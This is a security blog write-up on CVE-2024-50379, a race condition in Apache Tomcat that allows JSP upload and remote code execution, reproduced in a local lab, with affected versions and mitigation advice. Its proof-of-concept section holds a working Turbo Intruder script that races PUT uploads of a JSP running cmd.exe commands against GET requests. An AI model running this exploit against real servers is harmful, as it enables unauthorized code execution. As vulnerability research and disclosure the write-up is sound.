CVE-2024-50379: Apache Tomcat Race Condition Vulnerability Leads to Remote Code Execution

[Write-up] CVE-2024-50379: Apache Tomcat Race Condition POC - RCE Tested on Local Lab.

Introduction

Apache Tomcat is an open-source web server and servlet container developed by the Apache Software Foundation (ASF). It is designed to execute Java-based web applications, providing a “pure Java” HTTP server environment for running Java Servlets, JavaServer Pages (JSP), and other Java-based web technologies.

At its core, Tomcat serves as a bridge between Java code and web browsers, enabling developers to create dynamic and interactive web applications. Its robust architecture and active community support make it a popular choice for developers who require flexibility and scalability.

Disclaimer:
The techniques and information described in this document are intended solely for educational purposes and to enhance understanding of security vulnerabilities within a controlled Local Lab Environment. All activities discussed in this document were conducted in a local lab setting. Unauthorized application of these methods outside approved environments is strictly prohibited, as it is illegal, unethical, and may result in severe legal and personal consequences.

The author disclaims all responsibility for any misuse of the information provided. It is the sole responsibility of the reader to ensure their actions comply with all applicable laws and ethical guidelines. The author strongly emphasizes the importance of acting responsibly and refraining from engaging in any activity that exploits vulnerabilities or compromises the safety, privacy, or integrity of systems and individuals.

Table of Contents

1. Summary of the Vulnerability
2. Affected Versions
3. Requirements
4. Steps to Reproduce & Proof of Concept (POC)
5. Impact
6. Mitigation

Summary of the Vulnerability

CVE-2024-50379 is a recently disclosed vulnerability affecting Apache Tomcat, a popular open-source Java web server and servlet container. This flaw arises from a Race Condition within Tomcat’s file handling processes, particularly during JavaServer Pages (JSP) compilation. On case-insensitive file systems, the vulnerability enables attackers to exploit a Time-of-Check to Time-of-Use (TOCTOU) condition, potentially allowing malicious files to be executed as JSPs.

Affected Versions

The following versions of Apache Tomcat are affected by this vulnerability:

• Version 9.0.0.M1 ≤ Apache Tomcat < 9.0.98
• Version 10.1.0-M1 ≤ Apache Tomcat < 10.1.34
• Version 11.0.0-M1 ≤ Apache Tomcat < 11.0.2

Requirements

Below are the specific requirements and condition used to test this vulnerability in my local lab:

• Vmware Workstation 17
• Windows 10 64-bit
• Java (JDK) 11
• Apache Tomcat version 10.1.33
• Burp Suite Community Edition with Turbo Intruder Extension installed
• Specific configuration changes in Apache Tomcat (Refer to the POC section)

Steps to Reproduce & Proof of Concept (POC)

1. Set up a virtual machine with Windows 10 64-bit installed

2. Install Java (JDK) and Apache Tomcat version 10.1.33, then Start your Tomcat server

3. Install the Turbo Intruder Extension in Burp Suite. This can be done by selecting Extension Tab and choosing theBApp Store

4. Update the configuration to meet the vulnerability criteria.
➟ Open conf\web.xml
➟ Find the <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
➟ Add the readonly parameter set to false

  <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

7. Restart the server to apply the changes

8. Open a browser and navigate tohttp://<your_ip>:8080/. In my lab, I usedhttp://tomcatlab.local:8080/

9. Observe the requests in Burp Suite’s history. Right-click on a request and choose Send to Repeater

10. In Repeater, right-click and select Extensions → Turbo Intruder →Send to turbo intruder

12. Use a Turbo Intruder script and then click Attack

# Turbo Intruder (CVE-2024-50379)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=100,
                           requestsPerConnection=100,
                           pipeline=False
                          )

    # Request templates
    put_test1 = '''PUT /test1.Jsp HTTP/1.1
Host: tomcatlab.local:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Type: application/json
Connection: keep-alive
Content-Length: 345

<%@ page import="java.io.*" %>
<%
    try {
        Runtime.getRuntime().exec("cmd.exe /c whoami > \\\\ApacheTomcat\\\\webapps\\\\ROOT\\\\poc.jsp & dir >> \\\\ApacheTomcat\\\\webapps\\\\ROOT\\\\poc.jsp");
        out.println("Executed successfully.");
    } catch (Exception e) {
        out.println("Error: " + e.getMessage());
    }
%>
'''

    put_test2 = '''PUT /test2.Jsp HTTP/1.1
Host: tomcatlab.local:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Content-Type: application/json
Connection: keep-alive
Content-Length: 345

<%@ page import="java.io.*" %>
<%
    try {
        Runtime.getRuntime().exec("cmd.exe /c whoami > \\\\ApacheTomcat\\\\webapps\\\\ROOT\\\\poc.jsp & dir >> \\\\ApacheTomcat\\\\webapps\\\\ROOT\\\\poc.jsp");
        out.println("Executed successfully.");
    } catch (Exception e) {
        out.println("Error: " + e.getMessage());
    }
%>
'''

    get_test1 = '''GET /test1.jsp HTTP/1.1
Host: tomcatlab.local:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive

'''

    get_test2 = '''GET /test2.jsp HTTP/1.1
Host: tomcatlab.local:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive

'''

    # Race condition sequence
    for _ in range(2000):  # Number of iterations to increase race condition chances
        engine.queue(put_test1)
        engine.queue(put_test2)        
        engine.queue(get_test1)
        engine.queue(get_test2)
        
def handleResponse(req, interesting):
    if interesting:
        table.add(req)

13. Look for HTTP response status codes such as 201 or 204

14. Check the Tomcat directory (e.g., C:\ApacheTomcat\webapps\ROOT) for malicious .jsp file (directory setting in my lab)

15. In my lab, I created a poc.jsp file

16. Open a browser and navigate to http://<your_ip>:8080/poc.jsp

Impact

• Attackers can upload and executes malicious .jsp files due to the Race Condition
• Exploiting this vulnerability allows attackers to gain control of a vulnerable server and potentially access sensitive data

Mitigation

To protect against this vulnerability, users are strongly advised to upgrade to the latest version of Apache Tomcat:

• Upgrade to Apache Tomcat 11.0.2 or later [LINK]
• Upgrade to Apache Tomcat 10.1.34 or later [LINK]
• Upgrade to Apache Tomcat 9.0.98 or later [LINK]

Additional recommendations include:

• Set the readonly initialization parameter to true in the conf\web.xml
• Disable the HTTP PUT method and restart the server to apply the changes
• Avoid using a case-insensitive file system, as this contributes to the exploitation of the vulnerability.

Additional Resources:

• Apache
• NIST Gov
• Red Hat
• Github Profil [ph0ebus]

Thank you for taking the time to read and follow this tutorial. We hope you found it helpful and insightful.

Don’t forget to explore our other articles for more valuable tips and updates.

Latest Cybersecurity News, Vulnerabilities, and Technical Analysis